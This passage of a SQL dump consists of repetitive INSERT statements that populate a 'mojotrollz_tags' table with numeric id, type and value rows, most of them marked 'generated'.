`comment`) VALUES (61060, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61061, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61063, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61064, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61067, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61068, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61069, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61070, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61071, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61072, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61073, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61074, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61075, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61076, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61077, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61078, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61079, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61080, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61081, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61082, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61083, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61084, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61085, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61086, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61087, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61088, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61089, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61090, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61091, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61092, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61093, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61094, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61095, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61096, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61097, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61099, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61100, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61101, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61102, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61918, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61919, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61920, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61921, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61922, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61923, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61924, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61925, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61927, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61928, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61929, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61934, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61935, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61936, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61952, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (61953, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (63195, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (63197, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (63198, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (63674, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64856, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64857, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64858, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64859, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64860, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64861, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64862, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (64863, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (65407, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (66780, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (67234, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (68865, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69282, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69421, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69421, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69422, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69422, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69423, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69423, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69424, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69424, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69425, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69425, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69426, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69426, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69427, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69427, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69428, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69428, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69429, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69429, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69430, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69430, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69431, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69431, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69432, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69432, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69433, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69433, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69434, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69434, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69435, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69435, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69436, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69436, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69437, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69437, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69438, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (69438, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (70517, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (73940, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (73941, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74075, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74075, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74076, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74076, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74078, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74078, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74091, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74135, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74138, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74146, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74439, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74440, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74441, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74442, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74443, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74444, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74445, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74446, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74447, 2, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74447, 2, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74448, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74448, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74727, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74728, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74729, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (74730, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75293, 2, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75293, 2, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75295, 2, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75295, 2, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75295, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75295, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75296, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75296, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75297, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75297, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75298, 2, 1, 34, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75298, 2, 2, 717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75298, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75298, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75299, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75299, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75300, 2, 1, 129, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (75300, 2, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (77813, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80022, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (80023, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82136, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82137, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82138, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82139, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (82140, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (83763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85556, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85556, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85562, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (85563, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (86492, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (88497, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (88498, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89634, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89635, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (89931, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90566, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90567, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90858, 2, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (90858, 2, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91138, 2, 1, 33, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91138, 2, 2, 209, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91672, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91673, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91692, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91706, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91737, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (91738, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92011, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92013, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92015, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92067, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92098, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92099, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92140, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92141, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92142, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92143, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92252, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92388, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92419, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92420, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92423, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92424, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92426, 2, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92426, 2, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92427, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92458, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92489, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92490, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92524, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92525, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92526, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92527, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92528, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92529, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92530, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92531, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92532, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92533, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92534, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92535, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92536, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92537, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92538, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92539, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92540, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92541, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92542, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92543, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92544, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92545, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92546, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92547, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92548, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (92549, 2, 